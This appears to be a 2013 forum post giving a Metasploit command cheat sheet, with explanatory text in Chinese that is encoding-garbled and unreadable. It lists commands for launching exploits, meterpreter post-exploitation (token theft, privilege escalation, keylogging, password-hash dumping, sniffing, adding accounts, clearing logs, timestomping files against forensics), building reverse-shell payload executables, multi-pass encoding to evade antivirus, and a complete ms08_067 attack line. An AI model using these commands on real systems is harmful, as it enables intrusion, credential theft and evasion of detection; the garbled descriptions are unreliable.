admin 2013-3-14 20:31:18

MSFնȫ

http://pan.baidu.com/share/link?shareid=183103&uk=1110131489
show exploits
гmetasploitе͸ģ顣

show payloads
гmetasploitейغɡ

show auxiliary
гmetasploitеиغɡ

search name
metasploitе͸ģ顣

info
չʾƶ͸ģϢ

use name
װһ͸ģ顣

LHOST
㱾ؿĿӵIPַͨĿͬһʱҪһIPַرΪʽshellʹá

RHOST
ԶĿ

set function
ضòEGñػԶ

setg function
ȫַʽضòEGñػԶ

show options
гij͸ģеò

show targets
г͸ֵ֧Ŀƽ̨

set target num
ָ֪ĿIJϵͳԼ汾͡

set payload name
ָҪʹõĹغɡ

show advanced
ги߼ѡ

set autorunscript migrate -f.
͸ɺ󣬽ԶǨƵһ̡

check
ĿǷѡ͸Ӧİȫ©

exploit
ִ͸ģĿꡣ

exploit -j
ڼƻ½͸ں̨У

exploit -z
͸ɺػн

exploit -e encoder
ƶʹõĹغɱ뷽ʽEGexploit -e shikata_ga_nai

exploit -h
гexploitİϢ

sessions -l
гõĽỰڴshellʱʹã

sessions -l -v
гпõĽỰԼϸϢEGϵͳʱʹĸȫ©

sessions -s script
лԾmetasploitỰһضmetasploitű

sessions -K
ɱлԾĽỰ

sessions -c cmd
лԾmetasploitỰִһ

sessions -u sessionID
һͨwin32 shellmetasploit shell

db_create name
һݿҪʹõݿ⣨EGdb_create autopwn

db_connect name
һݿҪʹõݿ⣨EGdb_connect user:passwd@ip/sqlname

db_namp
nmapɨݴ洢ݿУ֧ͨnmap䣬EG-sT -v -P0

db_autopwn -h
չʾdb_autopwnİϢ

db_autopwn -p -r -e
зֵĿŶ˿ִdb_autopwnϵͳʹһʽshell

db_destroy
ɾǰݿ⡣

db_destroy userpasswd@hostport/database
ʹø߼ѡɾݿ⡣

***metasploit***
help
meterpreterʹð

run scriptname
meterpreterűscripts/meterpreterĿ¼¿ɲ鿴нű

sysinfo
гܿϵͳϢ

ls
гĿļļϢ

use priv
Ȩչģ飬չmetasploit⡣

ps
ʾеĽԼû˻

migrate PID
ǨƵһָĽIDPIDſͨpsϻã

use incognito
incognitoܣĿƻðû

list_tokens -u
гĿûĿơ

list_tokens -g
гĿûĿơ

impersonate_token DOMAIN_NAME\\USERNAME
ðĿϵĿơ

steal_token PID
Ը̵ĿƲƼð

drop_token
ֹͣðǰơ

getsystem
ֹͨϵͳûȨޡ

execute -f cmd.exe -i
ִcmd.exeн

execute -f cmd.exe -i -t
пִcmdظý̡

rev2self
صĿijʼû˻¡

reg command
ĿעннɾѯȲ

setdesktop number
лһû棨ùܻЩûѵ¼

screenshot
ĿĻнͼ

upload file
Ŀϴļ

download file
Ŀļ

keyscan_start
ԶĿ̼¼ܡ

keyscan_dump
洢Ŀϲļ̼¼

keyscan_stop
ֹͣĿļ̼¼

getprivs
ܶĻȡĿϵȨ

uictl enable keyboard/mouse
ӹĿļ̺ꡣ

background
㵱ǰmetasploit shellתΪִ̨С

hashdump
ĿеĿϣֵ

use sniffer
̽ģʽ

sniffer_interfaces
гĿпŵ˿ڡ

sniffer_dump interfaceID pcapname
Ŀ̽

sniffer_start interfaceID packet-buffer
ĿضΧݰ̽

sniffer_stats interfaceID
ȡʵʩ̽ӿڵͳݡ

sniffer_stop interfaceID
ֹͣ̽

add_user username password -h ip
ԶĿһû

clearev
Ŀϵ־¼

timestomp
޸ļԣ޸ļĴʱ䣨ȡ֤飩

reboot
Ŀ

***MSFpayload***
msfpayload -h
msfpayloadİϢ

msfpayload windows/meterpreter/bind_tcp O
гwindows/meterpreter/bind_tcp¿õĹغɵκιغɶǿõģ

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.exewindows¿ִг

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.rawļmsffencodeʹá

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
һmetasploitreverse_tcpغɣCʽshellcode

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
һmetasploitreverse_tcpغɣ%u뷽ʽjavaScriptַ

***msfencode***
mefencode -h
гmsfencodeİ

msfencode -l
гпõı

msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
ʾ뻺ĸʽ

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
ʹshikata_ga_naipayload.rawļ5룬Ȼ󵼳һΪencoded_payload.exeļ

msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
һֱʽǶױĹغɡ

msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
һĸֵshellcodeESIĴֻshellcodeCԸʽ

***MSFcli***
msfcli | grep exploit
г͸ģ顣

msfcli | grep exploit/windows
гwindowsص͸ģ顣

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
IPms08_067_netapi͸bind_tcpغɣPORT˿ڽм

ҳ: [1]
鿴汾: MSFնȫ